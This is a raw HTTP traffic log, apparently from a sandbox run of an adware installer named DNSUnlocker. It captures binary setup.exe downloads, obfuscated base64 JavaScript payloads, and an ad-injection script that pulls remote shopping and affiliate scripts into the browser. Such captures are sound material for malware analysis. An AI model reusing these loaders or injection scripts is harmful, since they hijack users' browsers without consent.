Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:47 GMT
Via: 1.1 varnish
Age: 1615
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1011
X-Timer: S1456422167.543334,VS0,VE0
Content-Range: bytes 382775-754213/1153385
Content-Length: 371439
zg.#...d.!.i...E..oKM.iN.H|.....(rA...AX'z. .>.b.7.G..j...~X..9/iX...u...f.8........Lu....5...'\....-...............7..h...QV..F~....K.xS.bc. 5.\...V..Otg.&.z.mI.*....im.&w....... ..4FH;.0.]..4.M.....*.J,J...VJ.x.......]..^...E...fJ8N.k .#x4..}...._..aT.4.Z*..cf=.p.E.(.......R\..L.....!trA.......xQ].xB......S.O;1..-#....y?O.rrW|dR....] ..|.:.rE...D./.....R1.H.&..[#-...Q..............V...h.V..`..T....z g.!"...$.o,...H*.&..S.W..j....3.......];V5.-3.LV .Dm!...e..|.m..5.R...wm...a...).D.G..E@9Q.u.$.}...A.BAt...=.AL..4......0..g6...k.F'.../...)M.o.'D{C..>E..#E.D.N.H`1g..z.J1d@....E...f.....q.%.......h.....x?B...i..@\..0_.^...7z.{GS..I....%K.b.B....y#.|.....k...=..Dp_r....2u...l..9vStQ9.i.H.~n_O....{..e.=.W....CB....ck:...........D2.f.....d......v..w..v.K.4w...6.W.(..R\..}-...e..B..i.W.....x....e..;Z..`.......M..[9.g".......~...C.h..>....q#......fn.....3lz...2Z.2.&....... ..;....n..0.'W....T..0t.k.c......{..v.f....0.2...`.......&.; ....7......V`.9..t`.>j........T.D.....d..3....&..3.N.r.k....v=F(............w.!..4..q....n_)s.....b..9.....3.T.tc......[.p...i$.R7@.J.P.j......o..._Q../a......y..Ze8.b.=.........A:.......w.^...A..........'J..q.6.p.A.\.`*q<)..d...v..;J...jJ../6..s.....e.=Bh.&.......86..&....'.Xk....w..>2..7...R-RB..2..r.m... .ELF.c....%c.....Vs.r.wt .r.=S......d.....J.........k$...u..M..Ln......I.r...... s....x.L(..'.....c..Y2...W.K.u..B&yB,...-..1.......b.(uz........./tt...?......'..wx.\; ...H......&.!.f.:.._N...hN.p...0 ..U.W.}...#..y..a~..F.....o.....`..G.PP1.8.hz..3...q..2..~.......D).
<<< skipped >>>
GET /download/66/60001/DNSUnlocker/setup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=754214-1153384
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
User-Agent: Microsoft BITS/6.7
Host: cdn.roastfiles2017.com
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Server: nginx/1.7.2
Content-Type: application/octet-stream
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: public, max-age=0
Pragma: no-cache
Accept-Ranges: bytes
Date: Thu, 25 Feb 2016 17:42:48 GMT
Via: 1.1 varnish
Age: 1616
Connection: keep-alive
X-Served-By: cache-fra1238-FRA
X-Cache: HIT
X-Cache-Hits: 1015
X-Timer: S1456422168.607492,VS0,VE0
Content-Range: bytes 754214-1153384/1153385
Content-Length: 399171
)....Xk.~......:.........,.s.b...`...1d...3.v'xI.w...`..........h.G........:...ET.|..SY..0...qcFOS....6.b..yV/_[.".i7..K[..........j..z..G..3................Qa..r._.Oc.R..*~.R.....Q....(.G..2.........l..T..0.k.w..U..BQ..v^.{?B..&..t.%M.<H*..F...c..[c.7..C.R.Q..e..x._.3....t...E.{...H.....7........Y6.r."9G.V........^9.?...s.(...;!..,q..J..6...v..! ...y.3s#..5@....Q.P.@..2.J...........x....T..?($h..-....k....t(Zl.....X....</u...=`........<:.....C....5.....i....gm@.x.*W.Z4.g......7.p..9...~..A...=..l...f....a...mg.'.#...4Yu.xA.y|...K~<F.G]....x.....q5.^.k.X.../.g.......KJK...)..5..g..;.yD.6^k....k.....|8.h.*.8...r.XB.9...f..l..x&9...z..L.,.7n...^....0....*...k.L2.......8.]-...w.........C...V7#a..9S.c\47,w.v.]Egq"......#{.I.C..l.m.....sE..qF....2..).m},......9.j...A..m.....s./i..C..H...p.H..Fm.....U../D3...8.T........'.....J.l.O..U..$r...|......[..?.Zl#..O(G..>..z...X.rZj!..vN.W......1.f.$=..Q.^..9...jcl....[*}..[....M....B...`...x<..p..#..#..N.,'.......0~.|.n.<Ri.>}9..m..m....&..n.4L....."...../.e....4[d.G$....g...K.!.i..x...f...jS..o..a...z..[..J5..k.....H..U .d.E..A.L.Q'C..Z/....w.f..M...B..<8.~Qp.9l..}9.().(4=.~.%.3v>g,BS'.........oEO.^...8C.AH^.&...?..x...?#!...s....R..M.u.W...J.....RlL.h.1.V.z....J*c....n2...HT>n....$..^...V....]...]..R.'..}.d?.Y..V....DXrl....*.4.i.. ~...Jl..o.....\.N...[...*..CSr...k..;....r.B.iT.!*Jd......8..YBGx.....;.._Awb!W...b{$...`..u.Z...../...}...V.e...)0.R...C.).......`..[........vb.~O.(3...3..N=.....0..2^.Z[!...^...|.".... ...a6g.6.z..AWy.>r/.V.
<<< skipped >>>
GET /installer_updates/002201/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:14 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1410796465"
Last-Modified: Mon, 15 Sep 2014 15:54:25 GMT
Cache-Control: max-age=21600
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1456422134.dop005.fr7.t,1456422134.cds020.fr7.s,1456422134.dop003.se1.r,1456422134.cds013.se1.p,1456422134.cds020.fr7.p
{"update_from_version":"NA","url":"NA"}..
GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.newdemoonlinecloud.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:22 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1454602831"
Last-Modified: Thu, 04 Feb 2016 16:20:31 GMT
Cache-Control: max-age=12635
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1456422142.dop010.fr7.t,1456422142.cds047.fr7.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">. .<event status="ok"/>. </app>.</response>...
GET /plugins/mins/424.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1435500466"
Last-Modified: Sun, 28 Jun 2015 14:07:46 GMT
Cache-Control: max-age=900
Content-Length: 1855
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds005.fr7.c
if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNGM1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZTBiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEzOTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMzUwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJlM2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMzMxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIxYTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5NDgyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJlMjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMjkzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQzMTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgxNzQ3NDAxYTE0MDExOTE5MDcxZDBjMTg0MDBlMWUwZTQ1MDExODJmMGMxNDA4MzIxOTBlMzUwNTE4MTIzYzU4MDQxZTRlMDAwYjFiMWIxMTBhMTEwMDI0MTU1ZTM1MjkyODIyMmMyNTNkM2YzODI3MmYyNDM0MzMyMjNiM2UzMjM4MjczNTI5NGQxMzBjMDMwMDE5MDMxYTI5MTkwZjE1NWUyOTMxMmUyMzJjMzkyNTM5MzkyNzMzM2MzMjMyMmMzZjM4M2YyMjNhMjkyZDIyMzUyNjM1Mjk0ZDE5MGQwNTFhMGMxZDBmMGIwMjAyMWYwZDIyMDcwMDE0NWUzNTI5MjgyMjJjMjUzZDNmMzgyNzJmMjQzNDM5MmQyNTNhMmMzZDJmMzUyMjIyM2QyNjI5MzE0YjEwMTMxYTNmMmY0ZDNjMjkyZDNmM2UzMDM5MjQyMjM0MjYyNDMxMmMyMTMzMzUzZjJmMmYzYzUwMjcyZjM4MjA1NzI5MzQzMzMxMzkz
<<< skipped >>>
GET /plugins/mins/223.js?ver=9&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314404"
Last-Modified: Thu, 11 Dec 2014 16:13:24 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }....
GET /plugins/mins/273.js?ver=6&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418314330"
Last-Modified: Thu, 11 Dec 2014 16:12:10 GMT
Cache-Control: max-age=900
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds007.fr7.c
if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }....
GET /plugins/mins/311.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1434015478"
Last-Modified: Thu, 11 Jun 2015 09:37:58 GMT
Cache-Control: max-age=900
Content-Length: 1055
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds062.fr7.c
if (typeof setup2 === 'function') { setup2('MWE3NDZlNDM0NTUxNTE0OTFlMWUxNTA5MzExMTA5NTM0YjRiNTQwMjE1MGQxNDU5NGE1ZTE4NDUxNTE4MDMxZjA5MDAwZjAyNWYwMjE4MGMwZTU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcxOTA1MWYwNjE5MzQwYjA4NDE1ZjUxNTMwMzAyMWUxMTBhNWU0YzRhMTgyZTA4MDQwODA3MTQwNzA5MTYyZTE4MDUxMDA1NGYwZDA4MTAwNjE1MWY0NTE1MDUwYzU2MDcxMTA3MTcxYzA4NTkwMDAwMGYwNTEwMDYwMzE4MWIwMjQ0MGIwYTViMDAwZDEwMWYwNTEzMDY1YzFhMTYwNzE3MmUyZTM0MzUzODJlMmEzNzMxMmMzNTM0MzkyOTJmMzkyZDIxMmQyMTM0MzUzNDI1M2YyMzI2MmQyNzNhMmU1NzBhMDYxYTM1MTAxMDBmMDA0YzJlMzQzNTM4MmUyYTM3MzEyYzM1MzQzOTI5MmIzMTI5M2IyZDI0M2MzNDM0Mjk0YzA5MTAwMDVlM2EyZTMyMzkzOTM5MzIyYjJkMjcyMDIzMmUzZTI1MmYzMzI2MmQyNzNhMmU1MzQ3N2I2MDQxNTk0NDQzNDcwMTFkMWUxMTAzMGYzMDAwNDE1ZjUxNDI1YTQ3Njc2YjA0', 'aydceqqkvj'); }....
GET /plugins/mins/380.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424181436"
Last-Modified: Tue, 17 Feb 2015 13:57:16 GMT
Cache-Control: max-age=582
Content-Length: 1303
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds004.fr7.c
if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExMTExMTYwNTE2MDY0YjM2M2MwNDEyMWUyNzA2MWMxZTNhMzY1ZTRkMzkyNzNiMzMzNjIyMzYzYjJhMmUyMzJhMjcyMjM2MjQyYjNkMzEzMzM5M2IzNzI1M2MyZTNhNGU1ODFkMGYxNjFjMGUwZTVmM2EzNjBkMWUwMDI3MTYwMDE0MTQzYTM2NWU0ZDM5MjczYjMzMzYyMjM2M2IyYTJlMjMyYTI3MjAyOTIxM2EyNzIyMjcyMzI3Mjc0NjQyNTM2ZjE0', 'ayqeicjfxx'); }....
<<< skipped >>>
GET /plugins/mins/184.js?ver=11&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=900
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds027.fr7.c
if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZjA4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0MzczZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNTU1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }....
<<< skipped >>>
GET /plugins/mins/102.js?ver=15&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426423396"
Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422148.dop006.fr7.t,1456422148.cds035.fr7.c
if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMWEwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFiMDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZTFhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUyNTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2MjczYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0NDUwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYxNzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MDQxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJhM2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZjNkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIzNDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMzAyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMxMTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }....
GET /plugins/mins/376.js?ver=12&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1450608516"
Last-Modified: Sun, 20 Dec 2015 10:48:36 GMT
Cache-Control: max-age=437
Content-Length: 11146
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422148.cds012.fr7.c
(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:"19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",nv:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"};var p="source_id";var k="776";var e="__PageActive__";var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime==="function")?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:"hXXp://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__",httpsUrl:"hXXps://istatic.eshopcomp.com/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"http://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_S
<<< skipped >>>
GET /plugins/mins/354.js?ver=2&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newcloudrack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2016 17:42:28 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418039174"
Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT
Cache-Control: max-age=535
Content-Length: 122978
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1456422149.dop006.fr7.t,1456422148.cds054.fr7.c
